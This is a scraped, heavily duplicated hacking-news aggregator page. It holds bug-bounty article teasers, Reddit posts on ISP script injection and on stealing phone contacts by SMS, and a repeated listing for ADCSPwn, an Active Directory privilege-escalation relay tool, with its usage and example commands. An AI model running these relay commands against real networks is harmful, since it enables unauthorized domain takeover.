Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How a 15 year old hacked his way to $1000
https://cdn-images-1.medium.com/max/2600/1*ktnlQPzGJdKDGxjRGeGKaA.png
Getting a job at 16 is hard. Making money in ways other than mundane tasks is difficult at a young age… Here’s how I hacked my way to $1000
Continue reading on Medium »
How a 15 year old hacked his way to $1000
https://cdn-images-1.medium.com/max/2600/1*ktnlQPzGJdKDGxjRGeGKaA.png
Getting a job at 16 is hard. Making money in ways other than mundane tasks is difficult at a young age… Here’s how I hacked my way to $1000
Continue reading on Medium »
How a 15 year old hacked his way to $1000
https://ethr.medium.com/how-a-15-year-old-hacked-his-way-to-1000-ba2c2e82729d?source=rss------bug_bounty-5
https://ethr.medium.com/how-a-15-year-old-hacked-his-way-to-1000-ba2c2e82729d?source=rss------bug_bounty-5
Getting a job at 16 is hard. Making money in ways other than mundane tasks is difficult at a young age… Here’s how I hacked my way to $1000Continue reading on Medium » (https://ethr.medium.com/how-a-15-year-old-hacked-his-way-to-1000-ba2c2e82729d?source=rss------bug_bounty-5)
Setup Your Private Burp Collaborator for SSRF/XXE
https://sicks3c.medium.com/setup-your-private-burp-collaborator-for-ssrf-xxe-fd6cf01c8ca?source=rss------bug_bounty-5
https://sicks3c.medium.com/setup-your-private-burp-collaborator-for-ssrf-xxe-fd6cf01c8ca?source=rss------bug_bounty-5
Burp-suite CollaboratorContinue reading on Medium » (https://sicks3c.medium.com/setup-your-private-burp-collaborator-for-ssrf-xxe-fd6cf01c8ca?source=rss------bug_bounty-5)
[TR] TryHackMe: LazyAdmin Makine Çözümü
https://medium.com/@Thirstypeng/tr-tryhackme-lazyadmin-makine-%C3%A7%C3%B6z%C3%BCm%C3%BC-81a776e1b874?source=rss------bug_bounty-5
https://medium.com/@Thirstypeng/tr-tryhackme-lazyadmin-makine-%C3%A7%C3%B6z%C3%BCm%C3%BC-81a776e1b874?source=rss------bug_bounty-5
Merhabalar bu yazımızda TryHackMe’de bulunan LazyAdmin makınesini çözeceğiz.Continue reading on Medium » (https://medium.com/@Thirstypeng/tr-tryhackme-lazyadmin-makine-%C3%A7%C3%B6z%C3%BCm%C3%BC-81a776e1b874?source=rss------bug_bounty-5)
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
ISP redirecting non-HTTPS sites to malicious sites.
It started with redirection to their own ads (data plans) before any HTTP site gets loaded.
I dealt with this by blocking all IP relating to those ads but ,now situation have become worse as every HTTP site has this script which redirects me to malicious sites no matter wherever i click.
Firstly i checked whether my browser was the culprit but it soon got ruled out as same problem persisted on my other devices and when using mobile network (different ISP) everything is normal (no redirection).
I tried contacting ISP for a solution but i don't expect them doing something as its government owed telecom service and rather slow in dealing with grievances (specially technical ones).
I tried looking into it and found out a correlation "utilizebossy.com" which is present in every target site sources.
What can i do to block these script injections on HTTP sites?
screenshot :- https://imgur.com/a/Fz5u4nr
submitted by /u/INFERNOMK1
[link] [comments]
ISP redirecting non-HTTPS sites to malicious sites.
It started with redirection to their own ads (data plans) before any HTTP site gets loaded.
I dealt with this by blocking all IP relating to those ads but ,now situation have become worse as every HTTP site has this script which redirects me to malicious sites no matter wherever i click.
Firstly i checked whether my browser was the culprit but it soon got ruled out as same problem persisted on my other devices and when using mobile network (different ISP) everything is normal (no redirection).
I tried contacting ISP for a solution but i don't expect them doing something as its government owed telecom service and rather slow in dealing with grievances (specially technical ones).
I tried looking into it and found out a correlation "utilizebossy.com" which is present in every target site sources.
What can i do to block these script injections on HTTP sites?
screenshot :- https://imgur.com/a/Fz5u4nr
submitted by /u/INFERNOMK1
[link] [comments]
hacking: security in practice
Is it possible to gain contacts data by sending sms on android?
Hi,
I was learning the basics of wireshark and burp suite recently. I was wondering, is it possible to craft a malicious message that will collect all the phone contacts of a specific phone?
I was hoping to send the message on Sim and recieve the data via internet
submitted by /u/Sweet-Remote-7556
[link] [comments]
Is it possible to gain contacts data by sending sms on android?
Hi,
I was learning the basics of wireshark and burp suite recently. I was wondering, is it possible to craft a malicious message that will collect all the phone contacts of a specific phone?
I was hoping to send the message on Sim and recieve the data via internet
submitted by /u/Sweet-Remote-7556
[link] [comments]
reddit
Is it possible to gain contacts data by sending sms on android?
Hi, I was learning the basics of wireshark and burp suite recently. I was wondering, is it possible to craft a malicious message that will...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
FREE Practical Ethical Hacking course from The Cyber Mentor
Coupon code: FREEFORMEPLEASE TCM Academy Link: https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course Udemy Link: https://www.udemy.com/course/practical-ethical-hacking/
Please use the links above. Add to cart then input the coupon code to get it for free. You do NOT need to enter credit card information. Only do this if you are choosing to purchase the course to support the platform and authors.
Code expires Wednesday, August 11th.
Thank you
submitted by /u/rj4511
[link] [comments]
FREE Practical Ethical Hacking course from The Cyber Mentor
Coupon code: FREEFORMEPLEASE TCM Academy Link: https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course Udemy Link: https://www.udemy.com/course/practical-ethical-hacking/
Please use the links above. Add to cart then input the coupon code to get it for free. You do NOT need to enter credit card information. Only do this if you are choosing to purchase the course to support the platform and authors.
Code expires Wednesday, August 11th.
Thank you
submitted by /u/rj4511
[link] [comments]
ADCSPwn - A Tool To Escalate Privileges In An Active Directory Network By Coercing Authenticate From Machine Accounts And Relaying To The Certificate Service
http://www.kitploit.com/2021/08/adcspwn-tool-to-escalate-privileges-in.html
http://www.kitploit.com/2021/08/adcspwn-tool-to-escalate-privileges-in.html
A tool to escalate privileges in an active directory (https://www.kitploit.com/search/label/Active%20Directory) network by coercing authenticate from machine accounts (Petitpotam) and relaying to the certificate service.
Usage
Run ADCSPwn on your target network. --port [local port] --remote [computer] Required arguments: adcs - This is the address of the AD CS server which authentication will be relayed to. Optional arguments: port - The port ADCSPwn will listen on. remote - Remote (https://www.kitploit.com/search/label/Remote) machine to trigger authentication from. username - Username (https://www.kitploit.com/search/label/Username) for non-domain context. password - Password for non-domain context. dc - Domain controller to query for Certificate Templates (LDAP). unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . output - Output path to store base64 generated crt. Example usage: adcspwn.exe --adcs cs.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share ">Author: @_batsec_ - MDSec ActiveBreach
Contributor: @Flangvik - TrustedSec
adcspwn.exe --adcs --port [local port] --remote [computer]
Required arguments:
adcs - This is the address of the AD CS server which authentication will be relayed to.
Optional arguments:
port - The port ADCSPwn will listen on.
remote - Remote machine to trigger authentication from.
username - Username for non-domain context.
password - Password for non-domain context.
dc - Domain controller to query for Certificate Templates (LDAP).
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
output - Output path to store base64 generated crt.
Example usage:
adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share
Download ADCSPwn (https://github.com/bats3c/ADCSPwn)
Usage
Run ADCSPwn on your target network. --port [local port] --remote [computer] Required arguments: adcs - This is the address of the AD CS server which authentication will be relayed to. Optional arguments: port - The port ADCSPwn will listen on. remote - Remote (https://www.kitploit.com/search/label/Remote) machine to trigger authentication from. username - Username (https://www.kitploit.com/search/label/Username) for non-domain context. password - Password for non-domain context. dc - Domain controller to query for Certificate Templates (LDAP). unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . output - Output path to store base64 generated crt. Example usage: adcspwn.exe --adcs cs.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share ">Author: @_batsec_ - MDSec ActiveBreach
Contributor: @Flangvik - TrustedSec
adcspwn.exe --adcs --port [local port] --remote [computer]
Required arguments:
adcs - This is the address of the AD CS server which authentication will be relayed to.
Optional arguments:
port - The port ADCSPwn will listen on.
remote - Remote machine to trigger authentication from.
username - Username for non-domain context.
password - Password for non-domain context.
dc - Domain controller to query for Certificate Templates (LDAP).
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
output - Output path to store base64 generated crt.
Example usage:
adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share
Download ADCSPwn (https://github.com/bats3c/ADCSPwn)
ADCSPwn - A Tool To Escalate Privileges In An Active Directory Network By Coercing Authenticate From Machine Accounts And Relaying To The Certificate Service
A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts (Petitpotam) and relaying to the certificate service.Usage Run ADCSPwn on your target network. authentication will be relayed to. Optional arguments: port - The port ADCSPwn will listen on. remote - Remote machine to trigger authentication from. username - Username for non-domain context. password - Password for non-domain context. dc - Domain controller to query for Certificate Templates (LDAP). unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . output - Output path to store base64 generated crt. Example usage: adcspwn.exe --adcs cs.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share ">Author: @_batsec_ - MDSec ActiveBreachContributor: @Flangvik - TrustedSecadcspwn.exe --adcs <cs server> --port local port --remote computerRequired arguments:adcs - This is the address of the AD CS server which authentication will be relayed to.Optional arguments:port - The port ADCSPwn will listen on.remote - Remote machine to trigger authentication from.username - Username for non-domain context.password - Password for non-domain context.dc - Domain controller to query for Certificate Templates (LDAP).unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .output - Output path to store base64 generated crt.Example usage:adcspwn.exe --adcs cs.pwnlab.localadcspwn.exe --adcs cs.pwnlab.local --port 9001adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.localadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txtadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.localadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share Download ADCSPwn
Read more...
A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts (Petitpotam) and relaying to the certificate service.Usage Run ADCSPwn on your target network. authentication will be relayed to. Optional arguments: port - The port ADCSPwn will listen on. remote - Remote machine to trigger authentication from. username - Username for non-domain context. password - Password for non-domain context. dc - Domain controller to query for Certificate Templates (LDAP). unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . output - Output path to store base64 generated crt. Example usage: adcspwn.exe --adcs cs.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share ">Author: @_batsec_ - MDSec ActiveBreachContributor: @Flangvik - TrustedSecadcspwn.exe --adcs <cs server> --port local port --remote computerRequired arguments:adcs - This is the address of the AD CS server which authentication will be relayed to.Optional arguments:port - The port ADCSPwn will listen on.remote - Remote machine to trigger authentication from.username - Username for non-domain context.password - Password for non-domain context.dc - Domain controller to query for Certificate Templates (LDAP).unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .output - Output path to store base64 generated crt.Example usage:adcspwn.exe --adcs cs.pwnlab.localadcspwn.exe --adcs cs.pwnlab.local --port 9001adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.localadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txtadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.localadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share Download ADCSPwn
Read more...